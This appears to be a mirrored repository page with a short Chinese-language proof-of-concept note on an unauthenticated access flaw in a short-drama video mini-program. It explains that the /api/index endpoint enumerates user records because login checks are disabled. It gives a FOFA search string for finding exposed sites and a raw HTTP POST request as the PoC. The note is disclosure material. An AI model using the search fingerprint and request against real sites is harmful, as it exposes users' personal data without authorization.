admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
wy876_POC/短剧影视小程序/短剧影视小程序前台未授权漏洞.md
wy876 2fdfb36b6f 240902更新漏洞
2024-09-02 10:54:47 +08:00

700 B
Raw Permalink Blame History

短剧影视小程序前台未授权漏洞

在 /api/controller/Index.php 控制器的index方法中很明显地存在 where 查询网站信息及User表中的字段并且将所有用户枚举出来且因为 $noNeedLogin = ['*'] 导致所有接口都无权限验证.

fofa

"/VwmRIfEYDH.php"

poc

POST /api/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

image-20240902103321159

漏洞来源